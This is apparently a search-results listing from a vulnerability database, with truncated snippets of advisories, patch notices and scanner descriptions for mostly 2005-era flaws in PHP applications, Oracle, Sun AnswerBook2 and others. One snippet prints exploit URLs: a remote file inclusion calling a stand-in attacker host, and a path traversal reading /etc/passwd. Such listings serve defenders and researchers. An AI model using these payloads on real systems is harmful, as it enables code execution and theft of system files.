4412 matches found
FreeBSD : phpwebftp -- 'language' Local File Inclusion (d9dc2697-dadf-11da-912f-00123ffe8333)
Secunia reports : phpWebFTP have a vulnerability, which can be exploited by malicious people to disclose sensitive information. Input passed to the 'language' parameter in index.php isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from...
Integrity Clientless Security (ICS) Update 3.7.68.0
Check Point Integrity Clientless Security ICS for Connectra prevents users with potentially harmful software from accessing your network and requires that they conform to the organization's antivirus and firewall policies. For more information, please refer to Connectra documentation and to ICS...
Integrity Clientless Security (ICS) Update 3.7.59.0
Check Point Integrity Clientless Security ICS for Connectra prevents users with potentially harmful software from accessing your network and requires that they conform to the organization's antivirus and firewall policies. For more information, please refer to Connectra documentation and to ICS...
Integrity Clientless Security (ICS) Update 3.7.57.0
Check Point Integrity Clientless Security ICS for Connectra prevents users with potentially harmful software from accessing your network and requires that they conform to the organization's antivirus and firewall policies. For more information, please refer to Connectra documentation and to ICS...
kernel security update
CentOS Errata and Security Advisory CESA-2006:0140 Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel...
Integrity Clientless Security (ICS) Update 3.7.50.0
Check Point Integrity Clientless Security ICS for Connectra prevents users with potentially harmful software from accessing your network and requires that they conform to the organization's antivirus and firewall policies. For more information, please refer to Connectra documentation and to ICS...
phpdocumentor_130rc4_incl_expl.txt
---- PhpDocumentor also, if magic_quotes_gpc off: http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=http://attacker/script.txt%00 http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=../../../../../../../etc/passwd%00...
PHP Doc System 1.5.1 Local file inclusion vuln.
PHP Doc System 1.5.1 Local file inclusion vuln. Vuln. discovered by : r0t Date: 27 nov. 2005 Original advisory:http://pridels.blogspot.com/2005/11/php-doc-system-151-local-file.html Vendor:http://www.alexking.org/ affected version: 1.5.1 and prior Product Description: A modular PHP system for...
Oracle DBMS_ASSERT and the October 2005 CPU
Whilst there are problems with the Oracle October 2005 Critical Patch Update, it's not all bad news.... There is a great deal of evidence in this patch that Oracle are beginning to treat security properly. They've introduced a new PL/SQL package DBMS_ASSERT into the RDBMS. Whilst DBMS_ASSER...
Oracle 9iAS access to SOAP documentation
In a default installation of Oracle 9iAS, it is possible to access SOAP documentation. These files might be useful for an attacker to determine what application server is being used. OpenVAS Vulnerability Test $Id: oracle9isoapdocs.nasl 8023 2017-12-07 08:36:26Z teissa $ Description: Oracle 9iAS...
Oracle 9i Application Server SOAP Documentation Accessible - Active Check
In a default installation of Oracle 9i Application Server AS, it is possible to access SOAP documentation. These files might be useful for an attacker to determine what application server is being used. SPDX-FileCopyrightText: 2003 Javier Fernandez-Sanguino Some text descriptions might be excerpt...
CVE-2005-2654
phpldapadmin before 0.9.6c allows remote attackers to gain anonymous access to the LDAP server, even when disable_anon_bind is set, via an HTTP request to login.php with the anonymous_bind parameter set...
FreeBSD : php -- multiple vulnerabilities (d47e9d19-5016-11d9-9b5f-0050569f0001)
Secunia reports : Multiple vulnerabilities have been reported in PHP, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The...
Moderate: Red Hat Security Advisory: spamassassin security update
An updated spamassassin package that fixes a denial of service bug when parsing malformed messages is now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. SpamAssassin provides a way to reduce unsolicited commercial email SPAM from...
ASP.NET __VIEWSTATE crypto validation prone to replay attacks
Good morning, ASP.NET's extremely popular VIEWSTATE functionality provides an automatic, uniform method for storing current state of all webpage "controls" including form fields, database views, etc, so that user-entered data automagically persists and is populated across newly rendered HTML, and...
Postgres: pg_hba.conf, md5, pg_shadow, encrypted passwords
Greetings, There appear to be some deficiencies in both the documentation of the 'md5' authentication methodology in pg_hba.conf and in the md5 hash generation which is stored in pg_shadow. The md5 hash which is generated for and stored in pg_shadow does not use a random salt but instead uses the...
BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit
Exploit for unknown platform in category local exploits ============================================================ BakBone NetVault 6.x/7.x Local Stack Buffer Overflow Exploit ============================================================ / for more informations class101.org/netv-locsbof.pdf /...
Multiple XSS issues in Sun AnswerBook2
PTT SECURITY ADVISORY DATE: 08-02-2005 AUTHOR: THOMAS LIAM ROMANIS CURRENT EMPLOYER: Echelon Ltd VENDOR: Sun PRODUCT: Sun AnswerBook2 VERSIONS TESTED: 1.4.4 on Solaris 8.0 Sparc TITLE: Multiple issues in Sun Answerbook2 Full Disclosure. Summary. A number of issues have been identified in Sun...
serversAlive.txt
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory information: Title: Servers Alive - Privilege Escalation CVE Candidate Number: CAN-2005-0352 Application: Servers Alive Versions known affected: 4.1, 5.0; other versions not tested. Classification: Privilege Escalation Author: Michael Starks...
CVE-2005-0548
Sun AnswerBook2 (Solaris)